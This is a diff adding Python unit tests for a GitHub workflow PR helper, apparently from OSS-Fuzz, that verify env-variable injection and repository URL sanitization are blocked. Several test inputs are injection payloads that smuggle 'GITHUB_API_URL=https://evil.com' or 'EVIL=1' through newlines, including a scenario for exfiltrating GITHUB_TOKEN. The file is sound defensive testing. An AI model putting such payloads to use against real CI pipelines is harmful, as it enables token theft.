|
| 1 | +#!/usr/bin/env python |
| 2 | +# Copyright 2026 Google LLC |
| 3 | +# |
| 4 | +# Licensed under the Apache License, Version 2.0 (the "License"); |
| 5 | +# you may not use this file except in compliance with the License. |
| 6 | +# You may obtain a copy of the License at |
| 7 | +# |
| 8 | +# http://www.apache.org/licenses/LICENSE-2.0 |
| 9 | +# |
| 10 | +# Unless required by applicable law or agreed to in writing, software |
| 11 | +# distributed under the License is distributed on an "AS IS" BASIS, |
| 12 | +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
| 13 | +# See the License for the specific language governing permissions and |
| 14 | +# limitations under the License. |
| 15 | +# |
| 16 | +################################################################################ |
| 17 | +"""PR helper env variable injection and URL sanitization tests.""" |
| 18 | + |
| 19 | +import os |
| 20 | +import tempfile |
| 21 | +import unittest |
| 22 | +from unittest import mock |
| 23 | + |
| 24 | +import pr_helper |
| 25 | + |
| 26 | +# pylint: disable=protected-access |
| 27 | + |
| 28 | + |
| 29 | +def _parse_github_env(content): |
| 30 | + """Parses GITHUB_ENV content into a dict of env var names to values.""" |
| 31 | + env_vars = {} |
| 32 | + lines = content.split('\n') |
| 33 | + i = 0 |
| 34 | + while i < len(lines): |
| 35 | + line = lines[i] |
| 36 | + if '<<' in line: |
| 37 | + name, delim = line.split('<<', 1) |
| 38 | + vals = [] |
| 39 | + i += 1 |
| 40 | + while i < len(lines) and lines[i] != delim: |
| 41 | + vals.append(lines[i]) |
| 42 | + i += 1 |
| 43 | + env_vars[name] = '\n'.join(vals) |
| 44 | + elif '=' in line: |
| 45 | + name, val = line.split('=', 1) |
| 46 | + env_vars[name] = val |
| 47 | + i += 1 |
| 48 | + return env_vars |
| 49 | + |
| 50 | + |
| 51 | +class ParseGithubEnvTest(unittest.TestCase): |
| 52 | + """Verify the test helper parses both GITHUB_ENV formats correctly.""" |
| 53 | + |
| 54 | + def test_key_value_format(self): |
| 55 | + """KEY=value lines are parsed correctly.""" |
| 56 | + content = 'FOO=bar\nBAZ=qux\n' |
| 57 | + self.assertEqual(_parse_github_env(content), {'FOO': 'bar', 'BAZ': 'qux'}) |
| 58 | + |
| 59 | + def test_delimiter_format(self): |
| 60 | + """KEY<<DELIM blocks are parsed correctly, including multiline values.""" |
| 61 | + content = 'MSG<<EOF\nhello\nworld\nEOF\nOTHER<<END\nval\nEND\n' |
| 62 | + env_vars = _parse_github_env(content) |
| 63 | + self.assertEqual(env_vars['MSG'], 'hello\nworld') |
| 64 | + self.assertEqual(env_vars['OTHER'], 'val') |
| 65 | + |
| 66 | + |
| 67 | +class SaveEnvTest(unittest.TestCase): |
| 68 | + """Verify save_env blocks env variable injection via GITHUB_ENV.""" |
| 69 | + |
| 70 | + def setUp(self): |
| 71 | + self.env_file = tempfile.NamedTemporaryFile(mode='w', |
| 72 | + delete=False, |
| 73 | + suffix='.env') |
| 74 | + self.env_file.close() |
| 75 | + self.patcher = mock.patch.dict(os.environ, |
| 76 | + {'GITHUB_ENV': self.env_file.name}) |
| 77 | + self.patcher.start() |
| 78 | + |
| 79 | + def tearDown(self): |
| 80 | + self.patcher.stop() |
| 81 | + os.unlink(self.env_file.name) |
| 82 | + |
| 83 | + def _read_env_file(self): |
| 84 | + with open(self.env_file.name, 'r', encoding='utf-8') as env_file: |
| 85 | + return env_file.read() |
| 86 | + |
| 87 | + @mock.patch('pr_helper.uuid.uuid4') |
| 88 | + def test_save_env_basic(self, mock_uuid): |
| 89 | + """Normal values produce correct delimiter-based output.""" |
| 90 | + mock_uuid.return_value.hex = 'deadbeef' |
| 91 | + pr_helper.save_env('hello world', True, False) |
| 92 | + expected = ('MESSAGE<<deadbeef\nhello world\ndeadbeef\n' |
| 93 | + 'IS_READY_FOR_MERGE<<deadbeef\nTrue\ndeadbeef\n' |
| 94 | + 'IS_INTERNAL<<deadbeef\nFalse\ndeadbeef\n') |
| 95 | + self.assertEqual(self._read_env_file(), expected) |
| 96 | + |
| 97 | + def test_save_env_newline_injection_blocked(self): |
| 98 | + """Newlines in message must not inject extra env vars.""" |
| 99 | + malicious = 'hello\nGITHUB_API_URL=https://evil.com' |
| 100 | + pr_helper.save_env(malicious, True, False) |
| 101 | + env_vars = _parse_github_env(self._read_env_file()) |
| 102 | + self.assertNotIn('GITHUB_API_URL', env_vars) |
| 103 | + self.assertEqual(len(env_vars), 3) |
| 104 | + |
| 105 | + def test_save_env_carriage_return_injection_blocked(self): |
| 106 | + """Carriage returns (\\r\\n, \\r) must not enable injection.""" |
| 107 | + pr_helper.save_env('a\r\nEVIL=1\rb', True, False) |
| 108 | + env_vars = _parse_github_env(self._read_env_file()) |
| 109 | + self.assertNotIn('EVIL', env_vars) |
| 110 | + self.assertEqual(len(env_vars), 3) |
| 111 | + |
| 112 | + def test_save_env_injection_via_all_fields(self): |
| 113 | + """Injection via is_ready_for_merge and is_internal is blocked.""" |
| 114 | + pr_helper.save_env('msg', 'True\nEVIL=1', 'False\nEVIL=2') |
| 115 | + env_vars = _parse_github_env(self._read_env_file()) |
| 116 | + self.assertNotIn('EVIL', env_vars) |
| 117 | + self.assertEqual(len(env_vars), 3) |
| 118 | + |
| 119 | + @mock.patch('pr_helper.uuid.uuid4') |
| 120 | + def test_save_env_none_values(self, mock_uuid): |
| 121 | + """None values (internal member path) are written safely.""" |
| 122 | + mock_uuid.return_value.hex = 'deadbeef' |
| 123 | + pr_helper.save_env(None, None, True) |
| 124 | + expected = ('MESSAGE<<deadbeef\nNone\ndeadbeef\n' |
| 125 | + 'IS_READY_FOR_MERGE<<deadbeef\nNone\ndeadbeef\n' |
| 126 | + 'IS_INTERNAL<<deadbeef\nTrue\ndeadbeef\n') |
| 127 | + self.assertEqual(self._read_env_file(), expected) |
| 128 | + |
| 129 | + def test_save_env_full_attack_scenario(self): |
| 130 | + """Reproduces the reported attack: malicious main_repo |
| 131 | + exfiltrating GITHUB_TOKEN.""" |
| 132 | + attack_url = ('https://github.com/attacker/repo\n' |
| 133 | + 'GITHUB_API_URL=https://evil.com\nx=1') |
| 134 | + message = (f'user is integrating a new project:<br/>' |
| 135 | + f'- Main repo: {attack_url}<br/>' |
| 136 | + f' - Criticality score: N/A<br/>') |
| 137 | + pr_helper.save_env(message, False, False) |
| 138 | + env_vars = _parse_github_env(self._read_env_file()) |
| 139 | + self.assertNotIn('GITHUB_API_URL', env_vars) |
| 140 | + self.assertNotIn('x', env_vars) |
| 141 | + self.assertEqual(len(env_vars), 3) |
| 142 | + |
| 143 | + |
| 144 | +class SanitizeRepoUrlTest(unittest.TestCase): |
| 145 | + """Verify _sanitize_repo_url strips control chars and validates scheme.""" |
| 146 | + |
| 147 | + def test_valid_url_unchanged(self): |
| 148 | + """Valid https, http, git://, and git@ URLs pass through unchanged.""" |
| 149 | + urls = [ |
| 150 | + 'https://github.com/google/oss-fuzz', |
| 151 | + 'https://github.com/abseil/abseil-cpp.git', |
| 152 | + 'https://bitbucket.org/nielsenb/aniso8601', |
| 153 | + 'https://chromium.googlesource.com/angle/angle', |
| 154 | + 'https://gitbox.apache.org/repos/asf/commons-io.git', |
| 155 | + 'https://github.com/apache/tika/', |
| 156 | + 'http://github.com/matthewwithanm/python-markdownify', |
| 157 | + 'git://git.gnupg.org/gnupg.git', |
| 158 | + 'git://code.qt.io/qt/qt5.git', |
| 159 | + 'git@github.com:typetools/checker-framework.git', |
| 160 | + 'git@github.com:google/jimfs.git', |
| 161 | + ] |
| 162 | + for url in urls: |
| 163 | + self.assertEqual(pr_helper._sanitize_repo_url(url), url) |
| 164 | + |
| 165 | + def test_url_with_newline_injection(self): |
| 166 | + """Newline-based env var injection payload is neutralized.""" |
| 167 | + url = 'https://github.com/attacker/repo\nGITHUB_API_URL=https://evil.com' |
| 168 | + result = pr_helper._sanitize_repo_url(url) |
| 169 | + self.assertIsNotNone(result) |
| 170 | + self.assertNotIn('\n', result) |
| 171 | + |
| 172 | + def test_url_with_carriage_return(self): |
| 173 | + """Carriage returns are stripped from URLs.""" |
| 174 | + result = pr_helper._sanitize_repo_url( |
| 175 | + 'https://github.com/example/repo\r\nEVIL=1') |
| 176 | + self.assertIsNotNone(result) |
| 177 | + self.assertNotIn('\r', result) |
| 178 | + self.assertNotIn('\n', result) |
| 179 | + |
| 180 | + def test_url_with_null_byte(self): |
| 181 | + """Null bytes are stripped from URLs.""" |
| 182 | + result = pr_helper._sanitize_repo_url('https://github.com/example/repo\x00') |
| 183 | + self.assertIsNotNone(result) |
| 184 | + self.assertNotIn('\x00', result) |
| 185 | + |
| 186 | + def test_none_returns_none(self): |
| 187 | + """None input returns None (preserves missing main_repo check).""" |
| 188 | + self.assertIsNone(pr_helper._sanitize_repo_url(None)) |
| 189 | + |
| 190 | + def test_url_with_git_suffix(self): |
| 191 | + """URLs with .git suffix are preserved.""" |
| 192 | + url = 'https://github.com/google/oss-fuzz.git' |
| 193 | + self.assertEqual(pr_helper._sanitize_repo_url(url), url) |
| 194 | + |
| 195 | + def test_invalid_scheme_rejected(self): |
| 196 | + """ftp://, file://, and bare strings are rejected.""" |
| 197 | + self.assertIsNone(pr_helper._sanitize_repo_url('ftp://example.com/repo')) |
| 198 | + self.assertIsNone(pr_helper._sanitize_repo_url('file:///etc/passwd')) |
| 199 | + self.assertIsNone(pr_helper._sanitize_repo_url('not-a-url')) |
| 200 | + |
| 201 | + def test_ssh_url_with_newline_injection(self): |
| 202 | + """SSH-style git@ URLs have control chars stripped.""" |
| 203 | + url = 'git@github.com:google/repo.git\nEVIL=1' |
| 204 | + result = pr_helper._sanitize_repo_url(url) |
| 205 | + self.assertNotIn('\n', result) |
| 206 | + self.assertEqual(result, 'git@github.com:google/repo.gitEVIL=1') |
| 207 | + |
| 208 | + |
| 209 | +class IsKnownContributorTest(unittest.TestCase): |
| 210 | + """Verify contact-list matching in is_known_contributor.""" |
| 211 | + |
| 212 | + def test_primary_contact_match(self): |
| 213 | + """Email matching primary_contact is recognized.""" |
| 214 | + content = { |
| 215 | + 'primary_contact': 'user@example.com', |
| 216 | + 'vendor_ccs': [], |
| 217 | + 'auto_ccs': [] |
| 218 | + } |
| 219 | + self.assertTrue(pr_helper.is_known_contributor(content, 'user@example.com')) |
| 220 | + |
| 221 | + def test_vendor_ccs_match(self): |
| 222 | + """Email in vendor_ccs list is recognized.""" |
| 223 | + content = { |
| 224 | + 'primary_contact': 'other@example.com', |
| 225 | + 'vendor_ccs': ['user@example.com'], |
| 226 | + 'auto_ccs': [] |
| 227 | + } |
| 228 | + self.assertTrue(pr_helper.is_known_contributor(content, 'user@example.com')) |
| 229 | + |
| 230 | + def test_auto_ccs_match(self): |
| 231 | + """Email in auto_ccs list is recognized.""" |
| 232 | + content = { |
| 233 | + 'primary_contact': 'other@example.com', |
| 234 | + 'vendor_ccs': [], |
| 235 | + 'auto_ccs': ['user@example.com'] |
| 236 | + } |
| 237 | + self.assertTrue(pr_helper.is_known_contributor(content, 'user@example.com')) |
| 238 | + |
| 239 | + def test_no_match(self): |
| 240 | + """Unknown email is not recognized as a contributor.""" |
| 241 | + content = { |
| 242 | + 'primary_contact': 'other@example.com', |
| 243 | + 'vendor_ccs': [], |
| 244 | + 'auto_ccs': [] |
| 245 | + } |
| 246 | + self.assertFalse(pr_helper.is_known_contributor(content, |
| 247 | + 'user@example.com')) |
| 248 | + |
| 249 | + |
| 250 | +if __name__ == '__main__': |
| 251 | + unittest.main() |
0 commit comments